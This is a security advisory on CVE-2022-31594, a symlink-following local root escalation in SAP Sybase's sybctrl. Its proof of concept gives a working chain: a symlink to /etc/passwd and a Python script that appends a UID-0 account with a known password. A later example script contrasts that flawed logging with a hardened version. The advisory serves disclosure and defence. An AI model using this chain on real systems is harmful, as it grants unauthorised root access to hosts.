Local privilege escalation in SAP® Sybase sybctrl

Title

Local privilege escalation

Product

SAP® Sybase sybctrl

Vulnerable Version

see section "Vulnerable / tested versions"

Fixed Version

see SAP® security note 3155571

CVE Number

CVE-2022-31594

Impact

low

Found

18.02.2022

By

Mingshuo Li (Office Munich) | SEC Consult Vulnerability Lab

The SUID-root program sybctrl of SAP® Sybase erroneously follows a symbolic link when it opens the file it logs error messages to. Pointing the link at a credential file lets a local attacker append partially controlled content to that file as root, which can grant root privileges.

 

 

Vendor description

"Sybase solutions strategic for data management. Combining the strength of in-memory technology with Sybase solutions, SAP® offers the most robust data platform to achieve business agility."

Source: https://www.sap.com/germany/acquired-brands/what-is-sybase.html

 

Business recommendation

SEC Consult recommends implementing SAP® security note 3155571, which according to the vendor fixes the documented issue. We advise installing the corrections as a matter of priority to keep business-critical data secure.

 

Vulnerability overview/description

1) Local privilege escalation (CVE-2022-31594)

The SUID-root program sybctrl by SAP® Sybase opens its error log file (dev_sybctrl in the current working directory) by name while running as root and follows a symbolic link placed there. Because the logged message embeds the unvalidated command-line argument, a member of the group sapsys can append attacker-chosen lines to any file writable by root and therefore escalate his/her privileges to root on a local Unix system.

 

Proof of Concept

1) Local privilege escalation (CVE-2022-31594)

The owner, group and permission bits of sybctrl in a standard installation are shown below: the binary is SUID root and executable only by members of the group sapsys.

$ ls -l sybctrl
-rwsr-x--- 1 root sapsys 4460399 Feb 28  2019 sybctrl

A user in the group sapsys first creates, in the working directory, a symbolic link named dev_sybctrl (the error log file sybctrl writes to) pointing to the passwd file.

$ ln -s /etc/passwd dev_sybctrl
$ ls -l dev_sybctrl
lrwxrwxrwx 1 secadm sapsys 11 Feb 18 15:30 dev_sybctrl -> /etc/passwd

Then the following Python script is run. It passes an invalid argument to sybctrl, which writes its error messages to the log file and thereby into the target of the dev_sybctrl link. The argument contains one line of user account information surrounded by newline characters so that the entry lands on a line of its own; the password hash was pre-calculated with openssl.

$ cat sol.py
import os
# Passwd entry for a new UID-0 account; hash pre-computed with "openssl passwd sappass".
u1_passwd = "sapmatt:wPi023oIkjHdA:0:0::/root:/bin/bash"
# The invalid argument is logged verbatim, so surrounding it with newlines puts the
# entry on its own line in the file behind the dev_sybctrl symlink.
os.execv("/usr/sap/SEC/SYS/exe/uc/linuxx86_64/sybctrl",
         ["sybctrl", "load_script", "cccc", "\x0a" + u1_passwd + "\x0a", "-auth"])

$ python3 sol.py 
Error: executing administration task failed.

As a result, the error messages are appended to /etc/passwd. The second-to-last line is a syntactically valid passwd entry with UID 0 and GID 0; the other appended lines are not valid entries and are simply ignored by the system, which is all the exploit needs.

$ tail -n 5 /etc/passwd
2022 02/18 15:30:33 == file opened ==
 DBSL patch version 400.
 Error: invalid argument: 
sapmatt:wPi023oIkjHdA:0:0::/root:/bin/bash
.

Switching to the new account with the password sappass completes the escalation:

$ su sapmatt
Password:
# id
uid=0(sapmatt) gid=0(root) groups=0(root)
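To make the mechanism concrete, the following Python script is an added example (not code from the advisory, from SEC Consult or from SAP): it models the flawed logger as a plain append-mode open that follows symbolic links, places a hardened variant beside it (O_NOFOLLOW, an fstat check on the opened descriptor, newline escaping), and runs both against a constructed stand-in for /etc/passwd in a temporary directory. The function names, the stand-in file and the exact log format are assumptions; the payload reuses the passwd entry from the PoC above.

```python
import errno
import os
import stat
import tempfile

# Payload taken from the PoC above: a UID-0 passwd entry wrapped in newlines so
# that it lands on a line of its own in whatever file the log is written to.
PAYLOAD = "\nsapmatt:wPi023oIkjHdA:0:0::/root:/bin/bash\n"
LOG_NAME = "dev_sybctrl"   # error log sybctrl creates in the working directory


def vulnerable_log(logdir, user_arg):
    """Simplified, assumed model of the flawed behaviour: the log is opened by
    name in append mode, which follows a symlink, and the rejected argument is
    written verbatim, newlines included."""
    with open(os.path.join(logdir, LOG_NAME), "a") as fh:
        fh.write("== file opened ==\n")
        fh.write(" Error: invalid argument: " + user_arg + "\n")


def hardened_log(logdir, user_arg):
    """Symlink-safe variant: O_NOFOLLOW makes open() fail with ELOOP on a
    symlink; fstat() on the descriptor rejects anything that is not a regular
    file with a single link owned by the effective user (a pre-created file or
    a hard link to /etc/passwd); newlines in the message are escaped so one
    logger call can never produce more than one line."""
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW
    fd = os.open(os.path.join(logdir, LOG_NAME), flags, 0o600)
    try:
        st = os.fstat(fd)
        if (not stat.S_ISREG(st.st_mode) or st.st_nlink != 1
                or st.st_uid != os.geteuid()):
            raise PermissionError("refusing to log to a file we did not create")
        safe = (user_arg.replace("\\", "\\\\")
                .replace("\n", "\\n").replace("\r", "\\r"))
        msg = "== file opened ==\n Error: invalid argument: " + safe + "\n"
        os.write(fd, msg.encode())
    finally:
        os.close(fd)


def root_accounts(passwd_text):
    """Names of syntactically valid passwd entries with UID 0. Lines without
    exactly seven colon-separated fields (the other log fragments appended by
    the exploit) are skipped, which is why the stray lines do no harm."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] and fields[2] == "0":
            names.append(fields[0])
    return names


def _stage(tmp, with_symlink):
    """Constructed stand-in for /etc/passwd plus, optionally, the attacker's link."""
    passwd = os.path.join(tmp, "passwd")
    with open(passwd, "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
    if with_symlink:
        os.symlink(passwd, os.path.join(tmp, LOG_NAME))
    return passwd


def demo():
    """Run the exploit chain against each logger and return the observations."""
    result = {}
    with tempfile.TemporaryDirectory() as tmp:
        passwd = _stage(tmp, True)
        vulnerable_log(tmp, PAYLOAD)                 # writes through the symlink
        with open(passwd) as fh:
            result["vulnerable"] = root_accounts(fh.read())
    with tempfile.TemporaryDirectory() as tmp:
        passwd = _stage(tmp, True)
        try:
            hardened_log(tmp, PAYLOAD)
            result["hardened"] = "wrote"
        except OSError as e:                         # expected: ELOOP
            result["hardened"] = errno.errorcode.get(e.errno, type(e).__name__)
        with open(passwd) as fh:
            result["after_hardened"] = root_accounts(fh.read())
    with tempfile.TemporaryDirectory() as tmp:
        _stage(tmp, False)
        hardened_log(tmp, PAYLOAD)                   # no link: logs, on one line
        with open(os.path.join(tmp, LOG_NAME)) as fh:
            result["hardened_log"] = fh.read().splitlines()
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The fstat check matters as much as O_NOFOLLOW: a file the attacker pre-creates in the working directory is not a symlink, and neither is a hard link to a root-owned file, so the ownership and link-count tests catch what O_NOFOLLOW alone does not. The cleanest fix is to stop writing logs into an attacker-writable directory at all.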

 

Vulnerable / tested versions

The following version of the binary was found to be vulnerable during our tests:

  • version 021 (753 03/23/2018 14:04:00)

According to the vendor the following products are affected by the discovered vulnerability:

SAP® Adaptive Server Enterprise (ASE), Versions:

  • KERNEL 7.22, 7.49, 7.53
  • KRNL64NUC 7.22, 7.22EXT, 7.49
  • KRNL64UC 7.22, 7.22EXT, 7.49, 7.53

Please refer to the vendor patch day post: https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10

Vendor contact timeline

2022-02-22 Contacting vendor through vulnerability submission web form.
2022-02-24 Vendor confirms receipt and assigns SAP® security incident number #2280077785.
2022-03-30 Vendor requests an elaboration on the CVSS vector.
2022-04-07 Requesting the original CVSS vector.
2022-04-22 Vendor responds to the request.
2022-04-29 Explaining the rationale behind the CVSS rating.
2022-06-14 Vendor releases patches with SAP® security note 3155571.
2022-06-15 Requesting the confirmation of the security note on the issue.
2022-08-11 Vendor sends the link to the Acknowledgements to Security Researchers.
2022-09-02 Requesting the confirmation of the fix.
2022-09-03 Vendor confirms the issue has been fixed on June Patch Day.
2022-09-16 Public release of security advisory.

Solution

The following security note needs to be implemented: https://launchpad.support.sap.com/#/notes/3155571

 

Workaround

You can remove the SUID bit from sybctrl as a temporary mitigation. Use a mode that keeps the existing group restriction (the binary is installed as 4750, see above); chmod 0755 would additionally grant execute permission to users outside the group sapsys.

# chmod u-s sybctrl

Verify with ls -l that the s bit is gone. Any administration task that relies on sybctrl running with root privileges will fail until the security note is applied, so treat this only as a stop-gap.

 

Advisory URL

https://sec-consult.com/vulnerability-lab/

 

EOF Mingshuo Li / @2022
